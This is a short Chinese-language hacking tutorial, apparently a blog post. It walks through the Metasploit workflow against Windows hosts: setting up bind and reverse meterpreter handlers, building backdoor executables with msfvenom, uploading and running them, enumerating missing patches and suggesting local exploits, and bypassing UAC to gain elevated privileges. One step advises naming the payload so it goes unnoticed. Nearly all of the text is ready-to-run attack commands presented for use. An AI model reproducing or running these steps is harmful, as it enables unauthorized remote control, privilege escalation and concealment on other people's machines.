正向监听:
msfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler # 使用这个模块连接远程木马;
set payload windows/x64/meterpreter/bind_tcp # 设置正向连接payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set rhost 192.168.x.x # 目标主机ip
set lport 6666 # 我们的kali本机端口
exploit
使用msfvenom模块生成正弹木马:
msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.x.x lport=6666 -f exe -o test2.exe
复现:
生成后门木马
启动监听
启动木马
通过shell工具上传我们得木马
执行后成功上线
查看打了哪些补丁
shell
systeminfo
对应网站查找exp
通过msf内置框架
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.162.132 LPORT=4444 -f exe > shell.exe
启动监听
运行木马
查看补丁信息
run post/windows/gather/enum_patches
查找exp
run post/multi/recon/local_exploit_suggester
UAC绕过提权
使用exploit/windows/loacal/ask模块绕过UAC
use exploit/windows/local/ask
set filename 123.exe #设置运行程序名,尽可能设置一个不易发现的名字。
set session 17
set lhost 192.168.xx.xx
set lport 2333
run
exploit/windows/local/bypassuac模块绕过UAC
use exploit/windows/local/bypassuac
set session 7
set lhost 192.168.xx.xx
学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
扫一扫
2792
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
